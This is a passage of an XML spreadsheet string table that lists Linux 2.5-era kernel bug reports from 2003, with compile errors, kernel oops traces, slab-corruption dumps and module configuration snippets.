  </si>
  <si>
    <t>Kernel compile fails</t>
  </si>
  <si>
    <t>2003-05-05 12:24 UTC</t>
  </si>
  <si>
    <t>2003-05-07 12:06 UTC</t>
  </si>
  <si>
    <t>Distribution: slackware 8.1 Hardware Environment: x86, 786MB memory, athlon Tbird Software Environment: glibc 2.3.1, gcc 3.2.3 Problem Description: kernel compile stops with the following message root@made0120:/usr/download/linux-2.5.61# make -s install # # using defaults found in .config # SPLIT include/linux/autoconf.h -&gt; include/config/* CHK include/asm-i386/asm_offsets.h UPD include/asm-i386/asm_offsets.h Starting the build. KBUILD_BUILTIN=1 KBUILD_MODULES= CHK include/linux/compile.h UPD include/linux/compile.h /tmp/ccFbehWi.s: Assembler messages: /tmp/ccFbehWi.s:1154: Error: Unknown pseudo-op: `.incbin' /tmp/ccFbehWi.s:1159: Error: Unknown pseudo-op: `.incbin' make[1]: *** [arch/i386/kernel/vsyscall.o] Error 1 make: *** [arch/i386/kernel] Error 2 Steps to reproduce: configure the kernel as done with 2.5.61 till 2.5.68. Included the config file as reference</t>
  </si>
  <si>
    <t>snd-ice1712 and snd-ice1724 contain functions with the same names</t>
  </si>
  <si>
    <t>2003-05-07 01:39 UTC</t>
  </si>
  <si>
    <t>2003-06-17 21:56 UTC</t>
  </si>
  <si>
    <t>Trying to compile both snd-ice1712 and snd-ice1724 statically into the kernel fails as follows: &lt;-- snip --&gt; ... ld -m elf_i386 -r -o sound/pci/ice1712/built-in.o sound/pci/ice1712/snd-ice1712.o sound/pci/ice1712/snd-ice1724.o sound/pci/ice1712/snd-ice1724.o(.text+0x540): In function `snd_ice1712_akm4xxx_init': : multiple definition of `snd_ice1712_akm4xxx_init' sound/pci/ice1712/snd-ice1712.o(.text+0x7580): first defined here sound/pci/ice1712/snd-ice1724.o(.text+0x2c0): In function `snd_ice1712_akm4xxx_reset': : multiple definition of `snd_ice1712_akm4xxx_reset' sound/pci/ice1712/snd-ice1712.o(.text+0x7300): first defined here sound/pci/ice1712/snd-ice1724.o(.text+0x8c0): In function `snd_ice1712_akm4xxx_build_controls': : multiple definition of `snd_ice1712_akm4xxx_build_controls' sound/pci/ice1712/snd-ice1712.o(.text+0x7900): first defined here sound/pci/ice1712/snd-ice1724.o(.text+0x0): In function `snd_ice1712_akm4xxx_write': : multiple definition of `snd_ice1712_akm4xxx_write' sound/pci/ice1712/snd-ice1712.o(.text+0x7040): first defined here make[3]: *** [sound/pci/ice1712/built-in.o] Error 1 &lt;-- snip --&gt;</t>
  </si>
  <si>
    <t>CMOVcc</t>
  </si>
  <si>
    <t>*</t>
  </si>
  <si>
    <t>2003-05-07 07:37 UTC</t>
  </si>
  <si>
    <t>2003-05-08 10:04 UTC</t>
  </si>
  <si>
    <t>kernel dies in sighandler when installing a game in winex3</t>
  </si>
  <si>
    <t>2003-05-07 13:49 UTC</t>
  </si>
  <si>
    <t>Moritz M</t>
  </si>
  <si>
    <t>2003-05-08 10:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux testing with certain components from sid Hardware Environment: Athlon Thunderbird XP 1700+ on Elitegroup K7-S5A-LAN, Sony DVD-ROM DDU 1211. dmesg and lspci -vvvv available at http://www.informatik.uni-bremen.de/~jmm/idecdbug-69.txt Software Environment: Kernel 2.5.69 without additional patches, winex 3.0 .config available at http://www.informatik.uni-bremen.de/~jmm/idecdbug-69.txt Problem Description: When installing the Windows game "Star Trek Voyager: Elite Force" in winex 3.0 the kernel dies in the interrupt handler. This is reproducable. The oops msg: kernel BUG at drivers/ide/ide-cd.c:2990! invalid operand: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c035bcc6&gt;] Tainted: G S EFLAGS: 00010286 EIP is at ide_cdrom_prep_fs+0xc6/0xd0 eax: ffffffff ebx: dfd6d540 ecx: 001f8d68 edx: 00000000 esi: fffa289c edi: ffffffff ebp: c0503e20 esp: c0503e00 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c0502000 task=c045bc80) Stack: c055ed40 001f1933 c0503e38 00000004 0007e35a c5b467a0 dfd6d540 c34b4d00 c0503e3c c03593ab c056315c dfd6d540 dfd6d540 c056314c dfe0a800 c0503e5c c03593ec dfd6d540 c0503e54 c02b65b4 00000000 00082ed8 00000000 c0503e84 Call Trace: [&lt;c03593ab&gt;] restore_request+0xab/0xc0 [&lt;c03593ec&gt;] cdrom_start_read+0x2c/0xc0 [&lt;c02b65b4&gt;] __delay+0x14/0x20 [&lt;c035a2e5&gt;] ide_do_rw_cdrom+0xa5/0x1c0 [&lt;c03499e7&gt;] start_request+0x107/0x160 [&lt;c0349c6d&gt;] ide_do_request+0x1fd/0x3a0 [&lt;c034a021&gt;] ide_timer_expiry+0x141/0x260 [&lt;c034ddb0&gt;] atapi_reset_pollfunc+0x0/0x120 [&lt;c0349ee0&gt;] ide_timer_expiry+0x0/0x260 [&lt;c012949e&gt;] run_timer_softirq+0xde/0x1c0 [&lt;c0124f8b&gt;] do_softirq+0xcb/0xd0 [&lt;c0116487&gt;] smp_apic_timer_interrupt+0xd7/0x140 [&lt;c01070c0&gt;] default_idle+0x0/0x40 [&lt;c0109f4a&gt;] apic_timer_interrupt+0x1a/0x20 [&lt;c01070c0&gt;] default_idle+0x0/0x40 [&lt;c01070f0&gt;] default_idle+0x30/0x40 [&lt;c010717b&gt;] cpu_idle+0x3b/0x50 [&lt;c0105000&gt;] _stext+0x0/0x70 [&lt;c05048c5&gt;] start_kernel+0x165/0x180 [&lt;c05044a0&gt;] unknown_bootoption+0x0/0x100 Code: 0f 0b ae 0b bd 7c 42 c0 eb 81 55 89 e5 53 8b 5d 08 0f b6 43 &lt;0&gt;Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing Steps to reproduce: 1. Mount the "Elite Force" CD-ROM 2. $ winex3 /cdrom/Setup.exe 3. Select "Install" 4. After a few seconds the system freezes</t>
  </si>
  <si>
    <t>modprobe ipv6 freezes system or crashes with "BUG at module.h:284"</t>
  </si>
  <si>
    <t>2003-05-08 10:49 UTC</t>
  </si>
  <si>
    <t>Ari Rahikkala</t>
  </si>
  <si>
    <t>(note: it seems there is at least one report similar to this on LKML and people are apparently saying that IPv6 is broken in 2.5. This report might therefore be just noise. I'm still filing it, just to be sure, but will be brief) Distribution: Gentoo Problem Description: Trying to modprobe ipv6 results in either a total system freeze (inside X, not even Ctrl-Alt-Del worked - I did not try to ssh in, though) or a "kernel BUG at include/linux/module.h:284!" (at the console, fresh after bootup) I haven't yet checked if the ipv6 module actually works - in fact, I didn't even know it was considered loaded until I checked ver_linux for this report. ksymoops output of the latter case will be included as an attachment. Distribution: Gentoo ver_linux output (this is after trying to load the ipv6 module and getting the "BUG at..." message): Linux &lt;snip! snip!&gt; 2.5.69 #3 Tue May 6 23:34:24 EEST 2003 i686 AMD Athlon(tm) XP 1800+ AuthenticAMD GNU/Linux Gnu C 3.2.2 Gnu make 3.80 util-linux 2.11y mount 2.11y module-init-tools 0.9.11 e2fsprogs 1.32 reiserfsprogs 3.6.4 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.8 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0.15 Modules Loaded ipv6 radeon agpgart pcspkr snd_rtctimer snd_seq_midi snd_emu10k1_synth snd_seq_oss snd_pcm_oss snd_mixer_oss snd_emux_synth snd_seq_virmidi snd_seq_midi_event snd_seq_midi_emul snd_seq snd_emu10k1 snd_rawmidi snd_pcm snd_timer snd_seq_device snd_ac97_codec snd_page_alloc snd_util_mem snd_hwdep snd soundcore ip_conntrack_irc ip_nat_irc ip_conntrack_ftp ip_nat_ftp tulip</t>
  </si>
  <si>
    <t>32bit programs don't dump the SSE2 registers when coredumping on x86-64</t>
  </si>
  <si>
    <t>x86-64</t>
  </si>
  <si>
    <t>2003-05-08 20:30 UTC</t>
  </si>
  <si>
    <t>2006-10-22 07:51 UTC</t>
  </si>
  <si>
    <t>See summary</t>
  </si>
  <si>
    <t>modules, kernel .text cannot be accessed through /proc/kcore</t>
  </si>
  <si>
    <t>2003-05-08 20:33 UTC</t>
  </si>
  <si>
    <t>2003-08-11 10:36 UTC</t>
  </si>
  <si>
    <t>Other architectures have the problem too. 2.4/x86-64.org has fixed it partially. It needed at least: - signedness fixes in proc - putting kernel and modules into the vmalloc vmlist - fixing vmalloc to deal with mappings in the vmlist outside the vmalloc range (two liner fix) But it has some locking issues with /proc left.</t>
  </si>
  <si>
    <t>timing problems on Opteron</t>
  </si>
  <si>
    <t>2003-05-08 20:35 UTC</t>
  </si>
  <si>
    <t>2003-06-26 13:21 UTC</t>
  </si>
  <si>
    <t>On some systems the real time clock is completely off (results in bogus fsck at boot etc.) Need forward porting of the 2.4 x86-64.org code, which works stable. Also need to port fixes from i386/2.5 (like part of John Stultz's patches for lost ticks and the monotonic timer infrastructure)</t>
  </si>
  <si>
    <t>umbrella bug: fixes/tuning from x86-64.org/2.4 still need to be forward ported</t>
  </si>
  <si>
    <t>2003-05-08 20:47 UTC</t>
  </si>
  <si>
    <t>2003-08-11 10:37 UTC</t>
  </si>
  <si>
    <t>Partial list: - Tuned assembly functions from arch/x86_64/lib/*. This could potentially speed up some benchmarks a lot. The old functions still in 2.5 do some stupid things like forcing freshly cleared pages out of cache. They also have better workarounds for Opteron Errata #91 (BIOS fix for that is also available, but a lot of boxes still have old BIOSes) - fix bogus gs exception path (was wrong in 2.4, likely buggy in 2.5 too) Can cause kernel oopses. - Synchronize 32bit emulation - Node parsing fixes. - Other things. Basically need to go through cvsps of the cvs.x86-64.org:/linux repository again and check everything has been applied to 2.5 too.</t>
  </si>
  <si>
    <t>change_pageattr corrupts memory (breaks AGP)</t>
  </si>
  <si>
    <t>2003-05-08 20:55 UTC</t>
  </si>
  <si>
    <t>testgart oopses. Goes away when the change_pageattr call is commented out from AGP.</t>
  </si>
  <si>
    <t>alternative() breaks on compilation with .text.exit on 2.5.69</t>
  </si>
  <si>
    <t>2003-05-09 16:06 UTC</t>
  </si>
  <si>
    <t>Cesar Eduardo Barros</t>
  </si>
  <si>
    <t>2003-05-31 06:46 UTC</t>
  </si>
  <si>
    <t>slab corruption when mounting ext3</t>
  </si>
  <si>
    <t>2003-05-10 12:35 UTC</t>
  </si>
  <si>
    <t>Ken Witherow</t>
  </si>
  <si>
    <t>2003-06-19 10:08 UTC</t>
  </si>
  <si>
    <t>Distribution: custom Hardware Environment: Tyan TigerMP with Dual Athlon MP, all SCSI system Software Environment: gcc 3.2.3, mount mount-2.11z, e2fsprogs 1.32 Problem Description: I get slab corruption while trying to mount the first partition with a ext3 journal, it doesn't happen when mounting the subsequent ones. It happens on every boot, sometimes (about 33% of the time) causing mount to segfault and not mount the other paritions - the rest of the time, it continues to boot normally EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sdc1, internal journal Slab corruption: start=df827000, expend=df8277ff, problemat=df827000 Data: D0 75 64 C1 01 00 00 00 1A D6 46 C0 B4 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 40 E6 3C C0 00 00 00 00 3C 86 81 DF 00 00 00 00 00 00 00 00 02 00 00 00 17 D6 46 C0 B8 67 F9 DF 04 00 00 00 24 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 CC 3C 81 DF 00 00 00 00 00 00 00 00 04 00 00 00 25 D6 46 C0 90 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 40 3C 81 DF 00 00 00 00 00 00 00 00 05 00 00 00 36 D6 46 C0 98 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 B4 3B 81 DF 00 00 00 00 00 00 00 00 07 00 00 00 47 D6 46 C0 9C 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 28 3B 81 DF 00 00 00 00 00 00 00 00 08 00 00 00 A5 D6 46 C0 A4 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 9C 3A 81 DF 00 00 00 00 00 00 00 00 06 00 00 00 54 D6 46 C0 94 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 10 3A 81 DF 00 00 00 00 00 00 00 00 09 00 00 00 63 D6 46 C0 A0 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 84 39 81 DF 00 00 00 00 00 00 00 00 03 00 00 00 77 D6 46 C0 A8 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 C4 30 81 DF 00 00 00 00 00 00 00 00 0E 00 00 00 81 D6 46 C0 C4 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 50 31 81 DF 00 00 00 00 00 00 00 00 0A 00 00 00 8B D6 46 C0 AC 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 DC 31 81 DF 00 00 00 00 00 00 00 00 0B 00 00 00 97 D6 46 C0 B0 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 68 32 81 DF 00 00 00 00 00 00 00 00 0C 00 00 00 B4 59 43 C0 BC 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 F4 32 81 DF 00 00 00 00 00 00 00 00 0D 00 00 00 A4 D6 46 C0 C0 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 00 00 00 00 80 33 81 DF 00 00 00 00 00 00 00 00 0F 00 00 00 AF D6 46 C0 C8 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 D0 E6 3C C0 40 E7 3C C0 0C 34 81 DF 00 00 00 00 00 00 00 00 10 00 00 00 BC D6 46 C0 CC 67 F9 DF 04 00 00 00 A4 01 00 00 00 00 00 00 D0 E6 3C C0 40 E7 3C C0 E0 37 81 DF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 60 C2 4C C0 00 00 00 00 00 00 00 00 6D 01 00 00 04 70 82 DF 00 00 00 00 00 00 00 00 F4 82 81 DF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 CB D6 46 C0 00 00 00 00 00 00 00 00 6D 01 00 00 F0 72 82 DF 00 00 00 00 00 00 00 00 80 A3 73 C1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 95 D5 46 C0 00 00 00 00 00 00 00 00 6D 01 00 00 48 73 82 DF 00 00 00 00 00 00 00 00 70 4E FD DF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 03 33 43 C0 00 00 00 00 00 00 00 00 6D 01 00 00 A0 73 82 DF 00 00 00 00 00 00 00 00 B0 45 FD DF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ****************************************** ************************************************************************************************************************ ************************************************************************************************************************ ************************************************************************************************************************ ************************************************************************************************************************ ************************************************************************************************************************ ************************************************************************************************************************ ************************************************************************************************************************ *************************************************************A5 Next: 08 7D 64 C1 01 00 00 00 29 D1 46 C0 74 36 81 DF 04 00 00 00 A4 01 00 00 00 00 00 00 90 80 12 C0 Call Trace: [&lt;c0143dd8&gt;] check_poison_obj+0x158/0x1a0 [&lt;c0145b11&gt;] kmalloc+0x171/0x1b0 [&lt;c01b139b&gt;] journal_init_revoke+0x8b/0x170 [&lt;c01b139b&gt;] journal_init_revoke+0x8b/0x170 [&lt;c01b24e9&gt;] journal_init_common+0x29/0x1b0 [&lt;c01b2652&gt;] journal_init_common+0x192/0x1b0 [&lt;c01b273f&gt;] journal_init_inode+0xf/0x120 [&lt;c01a7f10&gt;] ext3_get_journal+0xb0/0x110 [&lt;c01a822f&gt;] ext3_load_journal+0x7f/0x190 [&lt;c01a7cd9&gt;] ext3_fill_super+0x909/0xa70 [&lt;c0196c26&gt;] disk_name+0x66/0xc0 [&lt;c01650f8&gt;] get_sb_bdev+0x128/0x160 [&lt;c017cc47&gt;] alloc_vfsmnt+0x87/0xe0 [&lt;c01a8d2f&gt;] ext3_get_sb+0x2f/0x33 [&lt;c01a73d0&gt;] ext3_fill_super+0x0/0xa70 [&lt;c016534f&gt;] do_kern_mount+0x5f/0xe0 [&lt;c017e395&gt;] do_add_mount+0x95/0x180 [&lt;c017e6b5&gt;] do_mount+0x155/0x1b0 [&lt;c017e55a&gt;] copy_mount_options+0xda/0xe0 [&lt;c017ed6f&gt;] sys_mount+0xef/0x190 [&lt;c010977b&gt;] syscall_call+0x7/0xb EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sdc5, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sdc7, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sdd7, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sdc8, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sdb7, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sda1, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sda5, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sdb1, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sdb2, internal journal EXT3-fs: mounted filesystem with ordered data mode. Steps to reproduce: occurs during bootup</t>
  </si>
  <si>
    <t>loading emu10k1-gp segfaults</t>
  </si>
  <si>
    <t>2003-05-12 09:16 UTC</t>
  </si>
  <si>
    <t>Distribution: custom Hardware Environment: Dual Athlon 1800MP on S2460 (AMD MP chipset) with SB Live 5.1, gravis 4 button game pad (gameport, non USB) Software Environment: gcc 3.2.3, glibc 2.3.2, module-init-tools 0.9.10 Problem Description: When trying to auto-load the joystick driver, the emu10k1-gp module segfaults: May 12 11:58:25 death kernel: Unable to handle kernel paging request at virtual address 84815e57 May 12 11:58:25 death kernel: printing eip: May 12 11:58:25 death kernel: e0a3d30b May 12 11:58:25 death kernel: *pde = 00000000 May 12 11:58:25 death kernel: Oops: 0002 [#1] May 12 11:58:25 death kernel: CPU: 0 May 12 11:58:25 death kernel: EIP: 0060:[_end+541628007/1067754332] Tainted: PF May 12 11:58:25 death kernel: EFLAGS: 00010206 May 12 11:58:25 death kernel: EIP is at gameport_register_device+0x5b/0x80 [gameport] May 12 11:58:25 death kernel: eax: e0a3dd5d ebx: e0a3dd40 ecx: e0a3dd5d edx: e0a3dd80 May 12 11:58:25 death kernel: esi: e0a474b8 edi: e0a47500 ebp: c0486bdc esp: c473bf80 May 12 11:58:25 death kernel: ds: 007b es: 007b ss: 0068 May 12 11:58:25 death kernel: Process modprobe (pid: 17051, threadinfo=c473a000 task=d5cf06a0) May 12 11:58:25 death kernel: Stack: c0486bfc c0486bdc c0486bfc c0486bdc e0a3a014 e0a474b8 c013b1f6 c058f308 May 12 11:58:25 death kernel: 00000001 e0a47500 0804e050 00000004 0804eab0 00000000 00000000 c473a000 May 12 11:58:25 death kernel: c010977b 0804eab0 0000382a 0804e050 00000000 00000000 bffffa68 00000080 May 12 11:58:25 death kernel: Call Trace: May 12 11:58:25 death kernel: [_end+541614960/1067754332] +0x14/0x1a [analog] May 12 11:58:25 death kernel: [_end+541669396/1067754332] analog_dev+0x0/0x48 [analog] May 12 11:58:25 death kernel: [sys_init_module+406/592] sys_init_module+0x196/0x250 May 12 11:58:25 death kernel: [_end+541669468/1067754332] +0x0/0x900 [analog] May 12 11:58:25 death kernel: [syscall_call+7/11] syscall_call+0x7/0xb May 12 11:58:25 death kernel: May 12 11:58:25 death kernel: Code: 00 81 fa 80 dd a3 e0 75 dc 83 c4 08 5b 5e c3 89 74 24 04 89 it is then impossible to try to remove the analog or gameport drivers. When trying to load the emu10k1-gp driver directly afterward: May 12 12:01:56 death kernel: &lt;6&gt;input: Analog 2-axis 4-button joystick at pci00:0b.1/gameport0 [TSC timer, 1516 MHz cl ock, 836 ns res] May 12 12:01:56 death kernel: Unable to handle kernel paging request at virtual address 8481fd36 May 12 12:01:56 death kernel: printing eip: May 12 12:01:56 death kernel: e0a3d1eb May 12 12:01:56 death kernel: *pde = 00000000 May 12 12:01:56 death kernel: Oops: 0002 [#2] May 12 12:01:56 death kernel: CPU: 1 May 12 12:01:56 death kernel: EIP: 0060:[_end+541627719/1067754332] Tainted: PF May 12 12:01:56 death kernel: EFLAGS: 00010292 May 12 12:01:56 death kernel: EIP is at gameport_find_dev+0x3b/0x60 [gameport] May 12 12:01:56 death kernel: eax: e0a4743c ebx: e0a3dd78 ecx: e0a4743c edx: e0a3dd88 May 12 12:01:56 death kernel: esi: d22a7d5c edi: 00000008 ebp: dfe11500 esp: c3895ee4 May 12 12:01:56 death kernel: ds: 007b es: 007b ss: 0068 May 12 12:01:56 death kernel: Process modprobe (pid: 17093, threadinfo=c3894000 task=d5544cc0) May 12 12:01:56 death kernel: Stack: d22a7d5c e0a474b8 d22a7da8 dfe1159c e0a49124 d22a7d5c e0a491fe dfe117d8 May 12 12:01:56 death kernel: e0a491f3 d22a7d58 dfe117d8 00000008 dfe11500 e0a497e0 00000000 c04ba8e0 May 12 12:01:56 death kernel: c02137fe dfe11500 e0a49780 e0a49808 dfe1154c ffffffed c027d0a5 dfe1154c May 12 12:01:57 death kernel: Call Trace: May 12 12:01:57 death kernel: [_end+541669396/1067754332] analog_dev+0x0/0x48 [analog] May 12 12:01:57 death kernel: [_end+541676672/1067754332] +0x124/0x190 [emu10k1_gp] May 12 12:01:57 death kernel: [_end+541676890/1067754332] +0xb/0x2d [emu10k1_gp] May 12 12:01:57 death kernel: [_end+541676879/1067754332] +0x0/0x2d [emu10k1_gp] May 12 12:01:57 death kernel: [_end+541678396/1067754332] emu_driver+0x0/0xa0 [emu10k1_gp] May 12 12:01:57 death kernel: [pci_device_probe+94/112] pci_device_probe+0x5e/0x70 May 12 12:01:57 death kernel: [_end+541678300/1067754332] +0x0/0x60 [emu10k1_gp] May 12 12:01:57 death kernel: [_end+541678436/1067754332] emu_driver+0x28/0xa0 [emu10k1_gp] May 12 12:01:57 death kernel: [bus_match+69/128] bus_match+0x45/0x80 May 12 12:01:57 death kernel: [_end+541678436/1067754332] emu_driver+0x28/0xa0 [emu10k1_gp] May 12 12:01:57 death kernel: [_end+541678436/1067754332] emu_driver+0x28/0xa0 [emu10k1_gp] May 12 12:01:57 death kernel: [driver_attach+92/96] driver_attach+0x5c/0x60 May 12 12:01:57 death kernel: [_end+541678436/1067754332] emu_driver+0x28/0xa0 [emu10k1_gp] May 12 12:01:57 death kernel: [_end+541678484/1067754332] emu_driver+0x58/0xa0 [emu10k1_gp] May 12 12:01:57 death kernel: [bus_add_driver+161/192] bus_add_driver+0xa1/0xc0 May 12 12:01:57 death kernel: [_end+541678436/1067754332] emu_driver+0x28/0xa0 [emu10k1_gp] May 12 12:01:57 death kernel: [_end+541678556/1067754332] +0x0/0x900 [emu10k1_gp] May 12 12:01:57 death kernel: [pci_register_driver+68/96] pci_register_driver+0x44/0x60 May 12 12:01:57 death kernel: [_end+541678436/1067754332] emu_driver+0x28/0xa0 [emu10k1_gp] May 12 12:01:57 death kernel: [_end+541651823/1067754332] +0x13/0x3d [emu10k1_gp] May 12 12:01:57 death kernel: [_end+541678396/1067754332] emu_driver+0x0/0xa0 [emu10k1_gp] May 12 12:01:57 death kernel: [sys_init_module+406/592] sys_init_module+0x196/0x250 May 12 12:01:57 death kernel: [_end+541678556/1067754332] +0x0/0x900 [emu10k1_gp] May 12 12:01:57 death kernel: [syscall_call+7/11] syscall_call+0x7/0xb May 12 12:01:57 death kernel: May 12 12:01:57 death kernel: Code: 00 81 fa 88 dd a3 e0 75 dc 83 c4 08 5b 5e c3 8d b6 00 00 00 snippet from /etc/modprobe.conf options analog js=auto install binfmt-0000 /bin/true install char-major-10 /bin/true install char-major-10-1 /bin/true install dummy0 /sbin/modprobe -o dummy0 --ignore-install dummy install dummy1 /sbin/modprobe -o dummy1 --ignore-install dummy install eth0 /bin/true install hid /sbin/modprobe --ignore-install hid &amp;&amp; { /sbin/modprobe keybdev; /sbin/modprobe mousedev; /bin/true; } install input /sbin/modprobe --ignore-install input &amp;&amp; { /sbin/modprobe joydev; /sbin/modprobe emu10k1-gp; /sbin/modprob e analog; /bin/true; } install net-pf-10 /bin/true install net-pf-19 /bin/true install net-pf-3 /bin/true install net-pf-4 /bin/true install net-pf-5 /bin/true install net-pf-6 /bin/true install ov518_decomp { /sbin/modprobe ov511; }; /sbin/modprobe --ignore-install ov518_decomp install usbmouse /sbin/modprobe --ignore-install usbmouse &amp;&amp; { /sbin/modprobe hid; /bin/true; } install wacom /sbin/modprobe --ignore-install wacom &amp;&amp; { /sbin/modprobe evdev; /bin/true; } remove hid { /sbin/modprobe -r keybdev; /sbin/modprobe -r mousedev; }; /sbin/modprobe -r --ignore-remove hid remove input { /sbin/modprobe -r joydev; /sbin/modprobe -r emu10k1-gp; /sbin/modprobe -r analog; }; /sbin/modprobe -r -- ignore-remove input relative parts of .config: CONFIG_GAMEPORT=m CONFIG_SOUND_GAMEPORT=m CONFIG_GAMEPORT_EMU10K1=m CONFIG_INPUT=y CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1600 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=1200 CONFIG_INPUT_JOYDEV=m CONFIG_INPUT_EVDEV=y CONFIG_INPUT_EVBUG=m CONFIG_GAMEPORT=m CONFIG_SOUND_GAMEPORT=m CONFIG_GAMEPORT_EMU10K1=m CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_INPUT_JOYSTICK=y CONFIG_JOYSTICK_ANALOG=m CONFIG_JOYSTICK_TMDC=m CONFIG_JOYSTICK_WARRIOR=m CONFIG_INPUT_JOYDUMP=m Steps to reproduce: autoload joystick module or load emu10k1-gp module directly</t>
  </si>
  <si>
    <t>No proper locking on pci device and bus list</t>
  </si>
  <si>
    <t>2.X</t>
  </si>
  <si>
    <t>2003-05-12 15:31 UTC</t>
  </si>
  <si>
    <t>2003-06-23 09:41 UTC</t>
  </si>
  <si>
    <t>There is no locking of the pci device list or the pci bus list. This needs to be fixed.</t>
  </si>
  <si>
    <t>Nivedita Singhvi</t>
  </si>
  <si>
    <t>USB mouse freezes under X</t>
  </si>
  <si>
    <t>2.5.6[89], 2.5.6[89]-mm</t>
  </si>
  <si>
    <t>2003-05-13 09:56 UTC</t>
  </si>
  <si>
    <t>Bryan O'Sullivan</t>
  </si>
  <si>
    <t>2004-01-31 15:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat 9 Hardware Environment: Intel 82801DB hub, MS Intellimouse Explorer Software Environment: Vanilla RH9 Problem Description: When using the mouse under X, it sometimes freezes up, responding to no further input. This does not affect keyboard interactions (but I have a PS/2 kbd, not a USB one). The problem can be "cured" by switching virtual terminals, or by killing and restarting X. Steps to reproduce: Start X, open a few windows, waggle the mouse with vigour, preferably while dragging a window around over other windows (though this is not necessary). Within a few seconds, the mouse should freeze. The problem can take hours to manifest itself if the mouse isn't being used much, but it always happens.</t>
  </si>
  <si>
    <t>HID driver causes slab corruption</t>
  </si>
  <si>
    <t>2003-05-13 10:24 UTC</t>
  </si>
  <si>
    <t>2003-06-19 10:06 UTC</t>
  </si>
  <si>
    <t>Distribution: custom Hardware Environment: Athlon MP chipset, ohci chipset (AMD766), APC SmartUPS 1500 w/ USB Software Environment: gcc 3.2.3, glibc 2.3.2 Problem Description: after probing the UPS, slab corruption occurs. May 12 12:55:11 death kernel: hub 1-0:0: new USB device on port 1, assigned address 2 May 12 12:55:11 death kernel: slab error in cache_free_debugcheck(): cache `size-2048': double free, or memory before ob ject was overwritten May 12 12:55:11 death kernel: Call Trace: May 12 12:55:11 death kernel: [kfree+263/848] kfree+0x107/0x350 May 12 12:55:11 death kernel: [hid_free_device+100/112] hid_free_device+0x64/0x70 May 12 12:55:11 death kernel: [hid_free_device+100/112] hid_free_device+0x64/0x70 May 12 12:55:11 death kernel: [hid_parse_report+406/480] hid_parse_report+0x196/0x1e0 May 12 12:55:11 death kernel: [usb_hid_configure+387/1872] usb_hid_configure+0x163/0x750 May 12 12:55:11 death kernel: 